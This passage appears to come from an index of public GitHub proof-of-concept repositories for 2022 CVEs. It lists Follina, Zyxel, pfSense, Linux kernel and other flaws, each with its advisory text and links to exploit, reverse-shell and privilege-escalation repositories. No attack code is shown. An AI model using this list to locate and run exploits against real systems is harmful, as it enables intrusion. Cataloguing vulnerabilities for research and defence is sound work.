- [XxToxicScriptxX/CVE-2022-30190](https://github.com/XxToxicScriptxX/CVE-2022-30190)
- [ernestak/CVE-2022-30190](https://github.com/ernestak/CVE-2022-30190)
- [ernestak/Sigma-Rule-for-CVE-2022-30190](https://github.com/ernestak/Sigma-Rule-for-CVE-2022-30190)
- [MalwareTech/FollinaExtractor](https://github.com/MalwareTech/FollinaExtractor)
- [notherealhazard/follina-CVE-2022-30190](https://github.com/notherealhazard/follina-CVE-2022-30190)
- [Cerebrovinny/follina-CVE-2022-30190](https://github.com/Cerebrovinny/follina-CVE-2022-30190)
- [Lucaskrell/go_follina](https://github.com/Lucaskrell/go_follina)
- [Gra3s/CVE-2022-30190_EXP_PowerPoint](https://github.com/Gra3s/CVE-2022-30190_EXP_PowerPoint)
- [EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-](https://github.com/EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-)
- [jeffreybxu/five-nights-at-follina-s](https://github.com/jeffreybxu/five-nights-at-follina-s)
- [Captain404/Follina-CVE-2022-30190-PoC-sample](https://github.com/Captain404/Follina-CVE-2022-30190-PoC-sample)
- [winstxnhdw/CVE-2022-30190](https://github.com/winstxnhdw/CVE-2022-30190)
- [Imeneallouche/Follina-attack-CVE-2022-30190-](https://github.com/Imeneallouche/Follina-attack-CVE-2022-30190-)
- [mattjmillner/CVE-Smackdown](https://github.com/mattjmillner/CVE-Smackdown)
- [0xAbbarhSF/FollinaXploit](https://github.com/0xAbbarhSF/FollinaXploit)
- [michealadams30/Cve-2022-30190](https://github.com/michealadams30/Cve-2022-30190)
- [melting0256/Enterprise-Cybersecurity](https://github.com/melting0256/Enterprise-Cybersecurity)
- [yrkuo/CVE-2022-30190](https://github.com/yrkuo/CVE-2022-30190)
- [ToxicEnvelope/FOLLINA-CVE-2022-30190](https://github.com/ToxicEnvelope/FOLLINA-CVE-2022-30190)
- [hycheng15/CVE-2022-30190](https://github.com/hycheng15/CVE-2022-30190)
- [aminetitrofine/CVE-2022-30190](https://github.com/aminetitrofine/CVE-2022-30190)
- [Muhammad-Ali007/Follina_MSDT_CVE-2022-30190](https://github.com/Muhammad-Ali007/Follina_MSDT_CVE-2022-30190)
- [Jump-Wang-111/AmzWord](https://github.com/Jump-Wang-111/AmzWord)
- [shri142/ZipScan](https://github.com/shri142/ZipScan)
- [alien-keric/CVE-2022-30190](https://github.com/alien-keric/CVE-2022-30190)
- [ethicalblue/Follina-CVE-2022-30190-Sample](https://github.com/ethicalblue/Follina-CVE-2022-30190-Sample)
### CVE-2022-30203 (2022-07-12)
Windows Boot Manager Security Feature Bypass Vulnerability
- [Wack0/dubiousdisk](https://github.com/Wack0/dubiousdisk)
### CVE-2022-30206 (2022-07-12)
Windows Print Spooler Elevation of Privilege Vulnerability
- [MagicPwnrin/CVE-2022-30206](https://github.com/MagicPwnrin/CVE-2022-30206)
- [Malwareman007/CVE-2022-30206](https://github.com/Malwareman007/CVE-2022-30206)
### CVE-2022-30216 (2022-07-12)
Windows Server Service Tampering Vulnerability
- [corelight/CVE-2022-30216](https://github.com/corelight/CVE-2022-30216)
### CVE-2022-30292 (2022-05-04)
Heap-based buffer overflow in sqbaselib.cpp in SQUIRREL 3.2 due to lack of a certain sq_reservestack call.
- [sprushed/CVE-2022-30292](https://github.com/sprushed/CVE-2022-30292)
### CVE-2022-30333 (2022-05-09)
RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.
- [TheL1ghtVn/CVE-2022-30333-PoC](https://github.com/TheL1ghtVn/CVE-2022-30333-PoC)
- [rbowes-r7/unrar-cve-2022-30333-poc](https://github.com/rbowes-r7/unrar-cve-2022-30333-poc)
- [J0hnbX/CVE-2022-30333](https://github.com/J0hnbX/CVE-2022-30333)
- [aslitsecurity/Zimbra-CVE-2022-30333](https://github.com/aslitsecurity/Zimbra-CVE-2022-30333)
- [paradox0909/cve-2022-30333_online_rar_extracor](https://github.com/paradox0909/cve-2022-30333_online_rar_extracor)
### CVE-2022-30489 (2022-05-13)
WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.
- [badboycxcc/XSS-CVE-2022-30489](https://github.com/badboycxcc/XSS-CVE-2022-30489)
### CVE-2022-30507
- [yosef0x01/CVE-2022-30507-PoC](https://github.com/yosef0x01/CVE-2022-30507-PoC)
### CVE-2022-30510 (2022-05-27)
School Dormitory Management System 1.0 is vulnerable to SQL Injection via reports/daily_collection_report.php:59.
- [bigzooooz/CVE-2022-30510](https://github.com/bigzooooz/CVE-2022-30510)
### CVE-2022-30511 (2022-05-27)
School Dormitory Management System 1.0 is vulnerable to SQL Injection via accounts/view_details.php:4.
- [bigzooooz/CVE-2022-30511](https://github.com/bigzooooz/CVE-2022-30511)
### CVE-2022-30512 (2022-05-27)
School Dormitory Management System 1.0 is vulnerable to SQL Injection via accounts/payment_history.php:31.
- [bigzooooz/CVE-2022-30512](https://github.com/bigzooooz/CVE-2022-30512)
### CVE-2022-30513 (2022-05-27)
School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:125
- [bigzooooz/CVE-2022-30513](https://github.com/bigzooooz/CVE-2022-30513)
### CVE-2022-30514 (2022-05-27)
School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:126.
- [bigzooooz/CVE-2022-30514](https://github.com/bigzooooz/CVE-2022-30514)
### CVE-2022-30524 (2022-05-09)
There is an invalid memory access in the TextLine class in TextOutputDev.cc in Xpdf 4.0.4 because the text extractor mishandles characters at large y coordinates. It can be triggered by (for example) sending a crafted pdf file to the pdftotext binary, which allows a remote attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact.
- [rishvic/xpdf-docker](https://github.com/rishvic/xpdf-docker)
### CVE-2022-30525 (2022-05-12)
A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
- [jbaines-r7/victorian_machinery](https://github.com/jbaines-r7/victorian_machinery)
- [Henry4E36/CVE-2022-30525](https://github.com/Henry4E36/CVE-2022-30525)
- [shuai06/CVE-2022-30525](https://github.com/shuai06/CVE-2022-30525)
- [savior-only/CVE-2022-30525](https://github.com/savior-only/CVE-2022-30525)
- [M4fiaB0y/CVE-2022-30525](https://github.com/M4fiaB0y/CVE-2022-30525)
- [k0sf/CVE-2022-30525](https://github.com/k0sf/CVE-2022-30525)
- [superzerosec/CVE-2022-30525](https://github.com/superzerosec/CVE-2022-30525)
- [Chocapikk/CVE-2022-30525-Reverse-Shell](https://github.com/Chocapikk/CVE-2022-30525-Reverse-Shell)
- [160Team/CVE-2022-30525](https://github.com/160Team/CVE-2022-30525)
- [iveresk/cve-2022-30525](https://github.com/iveresk/cve-2022-30525)
- [west9b/CVE-2022-30525](https://github.com/west9b/CVE-2022-30525)
- [furkanzengin/CVE-2022-30525](https://github.com/furkanzengin/CVE-2022-30525)
- [ProngedFork/CVE-2022-30525](https://github.com/ProngedFork/CVE-2022-30525)
- [cbk914/CVE-2022-30525_check](https://github.com/cbk914/CVE-2022-30525_check)
- [arajsingh-infosec/CVE-2022-30525_Exploit](https://github.com/arajsingh-infosec/CVE-2022-30525_Exploit)
### CVE-2022-30526 (2022-07-19)
A privilege escalation vulnerability was identified in the CLI command of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 through 5.30, USG20(W)-VPN firmware versions 4.16 through 5.30, ATP series firmware versions 4.32 through 5.30, VPN series firmware versions 4.30 through 5.30, USG/ZyWALL series firmware versions 4.09 through 4.72, which could allow a local attacker to execute some OS commands with root privileges in some directories on a vulnerable device.
- [greek0x0/CVE-2022-30526](https://github.com/greek0x0/CVE-2022-30526)
### CVE-2022-30591 (2022-07-06)
quic-go through 0.27.0 allows remote attackers to cause a denial of service (CPU consumption) via a Slowloris variant in which incomplete QUIC or HTTP/3 requests are sent. This occurs because mtu_discoverer.go misparses the MTU Discovery service and consequently overflows the probe timer. NOTE: the vendor's position is that this behavior should not be listed as a vulnerability on the CVE List
- [efchatz/QUIC-attacks](https://github.com/efchatz/QUIC-attacks)
### CVE-2022-30592 (2022-05-11)
liblsquic/lsquic_qenc_hdl.c in LiteSpeed QUIC (aka LSQUIC) before 3.1.0 mishandles MAX_TABLE_CAPACITY.
- [efchatz/HTTP3-attacks](https://github.com/efchatz/HTTP3-attacks)
### CVE-2022-30594 (2022-05-12)
The Linux kernel before 5.17.2 mishandles seccomp permissions. The PTRACE_SEIZE code path allows attackers to bypass intended restrictions on setting the PT_SUSPEND_SECCOMP flag.
- [Lay0us/linux-4.19.72_CVE-2022-30594](https://github.com/Lay0us/linux-4.19.72_CVE-2022-30594)
### CVE-2022-30600 (2022-05-18)
A flaw was found in moodle where logic used to count failed login attempts could result in the account lockout threshold being bypassed.
- [Boonjune/POC-CVE-2022-30600](https://github.com/Boonjune/POC-CVE-2022-30600)
### CVE-2022-30778
- [kang8/CVE-2022-30778](https://github.com/kang8/CVE-2022-30778)
### CVE-2022-30780 (2022-06-11)
Lighttpd 1.4.56 through 1.4.58 allows a remote attacker to cause a denial of service (CPU consumption from stuck connections) because connection_read_header_more in connections.c has a typo that disrupts use of multiple read operations on large headers.
- [p0dalirius/CVE-2022-30780-lighttpd-denial-of-service](https://github.com/p0dalirius/CVE-2022-30780-lighttpd-denial-of-service)
- [xiw1ll/CVE-2022-30780_Checker](https://github.com/xiw1ll/CVE-2022-30780_Checker)
### CVE-2022-30781 (2022-05-16)
Gitea before 1.16.7 does not escape git fetch remote.
- [wuhan005/CVE-2022-30781](https://github.com/wuhan005/CVE-2022-30781)
### CVE-2022-30887 (2022-05-20)
Pharmacy Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file.
- [MuallimNaci/CVE-2022-30887](https://github.com/MuallimNaci/CVE-2022-30887)
### CVE-2022-30929 (2022-07-06)
Mini-Tmall v1.0 is vulnerable to Insecure Permissions via tomcat-embed-jasper.
- [nanaao/CVE-2022-30929](https://github.com/nanaao/CVE-2022-30929)
### CVE-2022-31007 (2022-05-31)
eLabFTW is an electronic lab notebook manager for research teams. Prior to version 4.3.0, a vulnerability allows an authenticated user with an administrator role in a team to assign itself system administrator privileges within the application, or create a new system administrator account. The issue has been corrected in eLabFTW version 4.3.0. In the context of eLabFTW, an administrator is a user account with certain privileges to manage users and content in their assigned team/teams. A system administrator account can manage all accounts, teams and edit system-wide settings within the application. The impact is not deemed as high, as it requires the attacker to have access to an administrator account. Regular user accounts cannot exploit this to gain admin rights. A workaround for one if the issues is removing the ability of administrators to create accounts.
- [gregscharf/CVE-2022-31007-Python-POC](https://github.com/gregscharf/CVE-2022-31007-Python-POC)
### CVE-2022-31061 (2022-06-28)
GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions there is a SQL injection vulnerability which is possible on login page. No user credentials are required to exploit this vulnerability. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.
- [Wangyanan131/CVE-2022-31061](https://github.com/Wangyanan131/CVE-2022-31061)
### CVE-2022-31101 (2022-06-27)
prestashop/blockwishlist is a prestashop extension which adds a block containing the customer's wishlists. In affected versions an authenticated customer can perform SQL injection. This issue is fixed in version 2.1.1. Users are advised to upgrade. There are no known workarounds for this issue.
- [MathiasReker/blmvuln](https://github.com/MathiasReker/blmvuln)
- [karthikuj/CVE-2022-31101](https://github.com/karthikuj/CVE-2022-31101)
### CVE-2022-31138 (2022-07-11)
mailcow is a mailserver suite. Prior to mailcow-dockerized version 2022-06a, an extended privilege vulnerability can be exploited by manipulating the custom parameters regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, or maxlinelengthcmd to execute arbitrary code. Users should update their mailcow instances with the `update.sh` script in the mailcow root directory to 2022-06a or newer to receive a patch for this issue. As a temporary workaround, the Syncjob ACL can be removed from all mailbox users, preventing changes to those settings.
- [ly1g3/Mailcow-CVE-2022-31138](https://github.com/ly1g3/Mailcow-CVE-2022-31138)
### CVE-2022-31144 (2022-07-19)
Redis is an in-memory database that persists on disk. A specially crafted `XAUTOCLAIM` command on a stream key in a specific state may result with heap overflow, and potentially remote code execution. This problem affects versions on the 7.x branch prior to 7.0.4. The patch is released in version 7.0.4.
- [SpiralBL0CK/CVE-2022-31144](https://github.com/SpiralBL0CK/CVE-2022-31144)
### CVE-2022-31181 (2022-08-01)
PrestaShop is an Open Source e-commerce platform. In versions from 1.6.0.10 and before 1.7.8.7 PrestaShop is subject to an SQL injection vulnerability which can be chained to call PHP's Eval function on attacker input. The problem is fixed in version 1.7.8.7. Users are advised to upgrade. Users unable to upgrade may delete the MySQL Smarty cache feature.
- [drkbcn/lblfixer_cve_2022_31181](https://github.com/drkbcn/lblfixer_cve_2022_31181)
### CVE-2022-31188 (2022-08-01)
CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade. There are no known workarounds for this issue.
- [emirpolatt/CVE-2022-31188](https://github.com/emirpolatt/CVE-2022-31188)
### CVE-2022-31245 (2022-05-20)
mailcow before 2022-05d allows a remote authenticated user to inject OS commands and escalate privileges to domain admin via the --debug option in conjunction with the ---PIPEMESS option in Sync Jobs.
- [ly1g3/Mailcow-CVE-2022-31245](https://github.com/ly1g3/Mailcow-CVE-2022-31245)
### CVE-2022-31262 (2022-08-17)
An exploitable local privilege escalation vulnerability exists in GOG Galaxy 2.0.46. Due to insufficient folder permissions, an attacker can hijack the %ProgramData%\GOG.com folder structure and change the GalaxyCommunication service executable to a malicious file, resulting in code execution as SYSTEM.
- [secure-77/CVE-2022-31262](https://github.com/secure-77/CVE-2022-31262)
### CVE-2022-31269 (2022-08-25)
Nortek Linear eMerge E3-Series devices through 0.32-09c place admin credentials in /test.txt that allow an attacker to open a building's doors. (This occurs in situations where the CVE-2019-7271 default credentials have been changed.)
- [Henry4E36/CVE-2022-31269](https://github.com/Henry4E36/CVE-2022-31269)
- [omarhashem123/CVE-2022-31269](https://github.com/omarhashem123/CVE-2022-31269)
### CVE-2022-31294 (2022-06-16)
An issue in the save_users() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily create or update user accounts.
- [bigzooooz/CVE-2022-31294](https://github.com/bigzooooz/CVE-2022-31294)
### CVE-2022-31295 (2022-06-16)
An issue in the delete_post() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily delete posts.
- [bigzooooz/CVE-2022-31295](https://github.com/bigzooooz/CVE-2022-31295)
### CVE-2022-31296 (2022-06-17)
Online Discussion Forum Site 1 was discovered to contain a blind SQL injection vulnerability via the component /odfs/posts/view_post.php.
- [bigzooooz/CVE-2022-31296](https://github.com/bigzooooz/CVE-2022-31296)
### CVE-2022-31297
- [bigzooooz/CVE-2022-31297](https://github.com/bigzooooz/CVE-2022-31297)
### CVE-2022-31298 (2022-06-16)
A cross-site scripting vulnerability in the ads comment section of Haraj v3.7 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.
- [bigzooooz/CVE-2022-31298](https://github.com/bigzooooz/CVE-2022-31298)
### CVE-2022-31299 (2022-06-16)
Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form.
- [bigzooooz/CVE-2022-31299](https://github.com/bigzooooz/CVE-2022-31299)
### CVE-2022-31300 (2022-06-16)
A cross-site scripting vulnerability in the DM Section component of Haraj v3.7 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.
- [bigzooooz/CVE-2022-31300](https://github.com/bigzooooz/CVE-2022-31300)
### CVE-2022-31301 (2022-06-16)
Haraj v3.7 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Post Ads component.
- [bigzooooz/CVE-2022-31301](https://github.com/bigzooooz/CVE-2022-31301)
### CVE-2022-31402 (2022-06-10)
ITOP v3.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via /itop/webservices/export-v2.php.
- [YavuzSahbaz/CVE-2022-31402](https://github.com/YavuzSahbaz/CVE-2022-31402)
### CVE-2022-31403 (2022-06-14)
ITOP v3.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via /itop/pages/ajax.render.php.
- [IbrahimEkimIsik/CVE-2022-31403](https://github.com/IbrahimEkimIsik/CVE-2022-31403)
### CVE-2022-31479 (2022-06-06)
An unauthenticated attacker can update the hostname with a specially crafted name that will allow for shell commands to be executed during the core collection process. This vulnerability impacts products based on HID Mercury Intelligent Controllers LP1501, LP1502, LP2500, LP4502, and EP4502 which contain firmware versions prior to 1.302 for the LP series and 1.296 for the EP series. An attacker with this level of access on the device can monitor all communications sent to and from this device, modify onboard relays, change configuration files, or cause the device to become unstable. The injected commands only get executed during start up or when unsafe calls regarding the hostname are used. This allows the attacker to gain remote access to the device and can make their persistence permanent by modifying the filesystem.
- [realyme/CVE-2022-31479-test](https://github.com/realyme/CVE-2022-31479-test)
### CVE-2022-31499 (2022-08-25)
Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256.
- [omarhashem123/CVE-2022-31499](https://github.com/omarhashem123/CVE-2022-31499)
### CVE-2022-31626 (2022-06-16)
In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when pdo_mysql extension with mysqlnd driver, if the third party is allowed to supply host to connect to and the password for the connection, password of excessive length can trigger a buffer overflow in PHP, which can lead to a remote code execution vulnerability.
- [amitlttwo/CVE-2022-31626](https://github.com/amitlttwo/CVE-2022-31626)
### CVE-2022-31629 (2022-09-28)
In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications.
- [silnex/CVE-2022-31629-poc](https://github.com/silnex/CVE-2022-31629-poc)
### CVE-2022-31691 (2022-11-04)
Spring Tools 4 for Eclipse version 4.16.0 and below as well as VSCode extensions such as Spring Boot Tools, Concourse CI Pipeline Editor, Bosh Editor and Cloudfoundry Manifest YML Support version 1.39.0 and below all use Snakeyaml library for YAML editing support. This library allows for some special syntax in the YAML that under certain circumstances allows for potentially harmful remote code execution by the attacker.
- [SpindleSec/CVE-2022-31691](https://github.com/SpindleSec/CVE-2022-31691)
### CVE-2022-31692 (2022-10-31)
Spring Security, versions 5.7 prior to 5.7.5 and 5.6 prior to 5.6.9 could be susceptible to authorization rules bypass via forward or include dispatcher types. Specifically, an application is vulnerable when all of the following are true: The application expects that Spring Security applies security to forward and include dispatcher types. The application uses the AuthorizationFilter either manually or via the authorizeHttpRequests() method. The application configures the FilterChainProxy to apply to forward and/or include requests (e.g. spring.security.filter.dispatcher-types = request, error, async, forward, include). The application may forward or include the request to a higher privilege-secured endpoint.The application configures Spring Security to apply to every dispatcher type via authorizeHttpRequests().shouldFilterAllDispatcherTypes(true)
- [SpindleSec/cve-2022-31692](https://github.com/SpindleSec/cve-2022-31692)
- [hotblac/cve-2022-31692](https://github.com/hotblac/cve-2022-31692)
### CVE-2022-31705 (2022-12-14)
VMware ESXi, Workstation, and Fusion contain a heap out-of-bounds write vulnerability in the USB 2.0 controller (EHCI). A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed.
- [s0duku/cve-2022-31705](https://github.com/s0duku/cve-2022-31705)
### CVE-2022-31749
- [jbaines-r7/hook](https://github.com/jbaines-r7/hook)
- [iveresk/cve-2022-31749](https://github.com/iveresk/cve-2022-31749)
### CVE-2022-31793 (2022-08-04)
do_request in request.c in muhttpd before 1.1.7 allows remote attackers to read arbitrary files by constructing a URL with a single character before a desired path on the filesystem. This occurs because the code skips over the first character when serving files. Arris NVG443, NVG599, NVG589, and NVG510 devices and Arris-derived BGW210 and BGW320 devices are affected.
- [xpgdgit/CVE-2022-31793](https://github.com/xpgdgit/CVE-2022-31793)
### CVE-2022-31798 (2022-08-25)
Nortek Linear eMerge E3-Series 0.32-07p devices are vulnerable to /card_scan.php?CardFormatNo= XSS with session fixation (via PHPSESSID) when they are chained together. This would allow an attacker to take over an admin account or a user account.
- [omarhashem123/CVE-2022-31798](https://github.com/omarhashem123/CVE-2022-31798)
### CVE-2022-31814 (2022-09-05)
pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
- [EvergreenCartoons/SenselessViolence](https://github.com/EvergreenCartoons/SenselessViolence)
- [Madliife0/CVE-2022-31814](https://github.com/Madliife0/CVE-2022-31814)
- [TheUnknownSoul/CVE-2022-31814](https://github.com/TheUnknownSoul/CVE-2022-31814)
- [drcayber/RCE](https://github.com/drcayber/RCE)
- [Chocapikk/CVE-2022-31814](https://github.com/Chocapikk/CVE-2022-31814)
- [dkstar11q/CVE-2022-31814](https://github.com/dkstar11q/CVE-2022-31814)
- [Laburity/CVE-2022-31814](https://github.com/Laburity/CVE-2022-31814)
- [ArunHAtter/CVE-2022-31814](https://github.com/ArunHAtter/CVE-2022-31814)
### CVE-2022-31854 (2022-07-07)
Codoforum v5.1 was discovered to contain an arbitrary file upload vulnerability via the logo change option in the admin panel.
- [Vikaran101/CVE-2022-31854](https://github.com/Vikaran101/CVE-2022-31854)
### CVE-2022-31889 (2023-04-05)
Cross Site Scripting (XSS) vulnerability in audit/templates/auditlogs.tmpl.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae.
- [reewardius/CVE-2022-31889](https://github.com/reewardius/CVE-2022-31889)
### CVE-2022-31890 (2023-04-05)
SQL Injection vulnerability in audit/class.audit.php in osTicket osTicket-plugins before commit a7842d494889fd5533d13deb3c6a7789768795ae via the order parameter to the getOrder function.
- [reewardius/CVE-2022-31890](https://github.com/reewardius/CVE-2022-31890)
### CVE-2022-31897 (2022-06-29)
SourceCodester Zoo Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via public_html/register_visitor?msg=.
- [angelopioamirante/CVE-2022-31897](https://github.com/angelopioamirante/CVE-2022-31897)
### CVE-2022-31898 (2022-10-27)
gl-inet GL-MT300N-V2 Mango v3.212 and GL-AX1800 Flint v3.214 were discovered to contain multiple command injection vulnerabilities via the ping_addr and trace_addr function parameters.
- [gigaryte/cve-2022-31898](https://github.com/gigaryte/cve-2022-31898)
### CVE-2022-31901 (2023-01-19)
Buffer overflow in function Notepad_plus::addHotSpot in Notepad++ v8.4.3 and earlier allows attackers to crash the application via two crafted files.
- [CDACesec/CVE-2022-31901](https://github.com/CDACesec/CVE-2022-31901)
### CVE-2022-31902 (2023-02-01)
Notepad++ v8.4.1 was discovered to contain a stack overflow via the component Finder::add().
- [CDACesec/CVE-2022-31902](https://github.com/CDACesec/CVE-2022-31902)
### CVE-2022-31983 (2022-06-01)
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=.
- [mel1huc4r/CVE-2022-31983](https://github.com/mel1huc4r/CVE-2022-31983)
### CVE-2022-32013 (2022-06-02)
Complete Online Job Search System v1.0 is vulnerable to SQL Injection via eris/admin/category/index.php?view=edit&id=.
- [heavenswill/CVE-2022-32013](https://github.com/heavenswill/CVE-2022-32013)
### CVE-2022-32060 (2022-07-07)
An arbitrary file upload vulnerability in the Update Branding Settings component of Snipe-IT v6.0.2 allows attackers to execute arbitrary code via a crafted file.
- [bypazs/CVE-2022-32060](https://github.com/bypazs/CVE-2022-32060)
### CVE-2022-32073 (2022-07-13)
WolfSSH v1.4.7 was discovered to contain an integer overflow via the function wolfSSH_SFTP_RecvRMDIR.
- [mgregus/project_BIT_nmap_script](https://github.com/mgregus/project_BIT_nmap_script)
### CVE-2022-32074 (2022-07-13)
A stored cross-site scripting (XSS) vulnerability in the component audit/class.audit.php of osTicket-plugins - Storage-FS before commit a7842d494889fd5533d13deb3c6a7789768795ae allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file.
- [reewardius/CVE-2022-32074](https://github.com/reewardius/CVE-2022-32074)
### CVE-2022-32114 (2022-07-13)
An unrestricted file upload vulnerability in the Add New Assets function of Strapi 4.1.12 allows attackers to conduct XSS attacks via a crafted PDF file. NOTE: the project documentation suggests that a user with the Media Library "Create (upload)" permission is supposed to be able to upload PDF files containing JavaScript, and that all files in a public assets folder are accessible to the outside world (unless the filename begins with a dot character). The administrator can choose to allow only image, video, and audio files (i.e., not PDF) if desired.
- [bypazs/CVE-2022-32114](https://github.com/bypazs/CVE-2022-32114)
### CVE-2022-32118 (2022-07-15)
Arox School ERP Pro v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the dispatchcategory parameter in backoffice.inc.php.
- [JC175/CVE-2022-32118](https://github.com/JC175/CVE-2022-32118)
### CVE-2022-32119 (2022-07-15)
Arox School ERP Pro v1.0 was discovered to contain multiple arbitrary file upload vulnerabilities via the Add Photo function at photogalleries.inc.php and the import staff excel function at 1finance_master.inc.php.
- [JC175/CVE-2022-32119](https://github.com/JC175/CVE-2022-32119)
### CVE-2022-32132
- [reewardius/CVE-2022-32132](https://github.com/reewardius/CVE-2022-32132)
### CVE-2022-32199 (2023-03-27)
db_convert.php in ScriptCase through 9.9.008 is vulnerable to Arbitrary File Deletion by an admin via a directory traversal sequence in the file parameter.
- [Toxich4/CVE-2022-32199](https://github.com/Toxich4/CVE-2022-32199)
### CVE-2022-32223 (2022-07-14)
Node.js is vulnerable to Hijack Execution Flow: DLL Hijacking under certain conditions on Windows platforms.This vulnerability can be exploited if the victim has the following dependencies on a Windows machine:* OpenSSL has been installed and “C:\Program Files\Common Files\SSL\openssl.cnf” exists.Whenever the above conditions are present, `node.exe` will search for `providers.dll` in the current user directory.After that, `node.exe` will try to search for `providers.dll` by the DLL Search Order in Windows.It is possible for an attacker to place the malicious file `providers.dll` under a variety of paths and exploit this vulnerability.
- [ianyong/cve-2022-32223](https://github.com/ianyong/cve-2022-32223)
### CVE-2022-32224 (2022-12-05)
A possible escalation to RCE vulnerability exists when using YAML serialized columns in Active Record < 7.0.3.1, <6.1.6.1, <6.0.5.1 and <5.2.8.1 which could allow an attacker, that can manipulate data in the database (via means like SQL injection), the ability to escalate to an RCE.
- [ooooooo-q/cve-2022-32224-rails](https://github.com/ooooooo-q/cve-2022-32224-rails)
### CVE-2022-32250 (2022-06-02)
net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free.
- [theori-io/CVE-2022-32250-exploit](https://github.com/theori-io/CVE-2022-32250-exploit)
- [ysanatomic/CVE-2022-32250-LPE](https://github.com/ysanatomic/CVE-2022-32250-LPE)
- [Decstor5/2022-32250LPE](https://github.com/Decstor5/2022-32250LPE)
- [Kristal-g/CVE-2022-32250](https://github.com/Kristal-g/CVE-2022-32250)
### CVE-2022-32532 (2022-06-28)
Apache Shiro before 1.9.1, A RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.
- [Lay0us/CVE-2022-32532](https://github.com/Lay0us/CVE-2022-32532)
### CVE-2022-32548 (2022-08-29)
An issue was discovered on certain DrayTek Vigor routers before July 2022 such as the Vigor3910 before 4.3.1.1. /cgi-bin/wlogin.cgi has a buffer overflow via the username or password to the aa or ab field.
- [MosaedH/CVE-2022-32548-RCE-POC](https://github.com/MosaedH/CVE-2022-32548-RCE-POC)
### CVE-2022-32832 (2022-09-23)
The issue was addressed with improved memory handling. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app with root privileges may be able to execute arbitrary code with kernel privileges.
- [Muirey03/CVE-2022-32832](https://github.com/Muirey03/CVE-2022-32832)
- [AkbarTrilaksana/CVE-2022-32832](https://github.com/AkbarTrilaksana/CVE-2022-32832)
### CVE-2022-32862 (2022-11-01)
This issue was addressed with improved data protection. This issue is fixed in macOS Big Sur 11.7.1, macOS Ventura 13, macOS Monterey 12.6.1. An app with root privileges may be able to access private information.
- [rohitc33/CVE-2022-32862](https://github.com/rohitc33/CVE-2022-32862)
### CVE-2022-32883 (2022-09-20)
A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.6, iOS 15.7 and iPadOS 15.7, iOS 16, macOS Big Sur 11.7. An app may be able to read sensitive location information.
- [breakpointHQ/CVE-2022-32883](https://github.com/breakpointHQ/CVE-2022-32883)
### CVE-2022-32898 (2022-11-01)
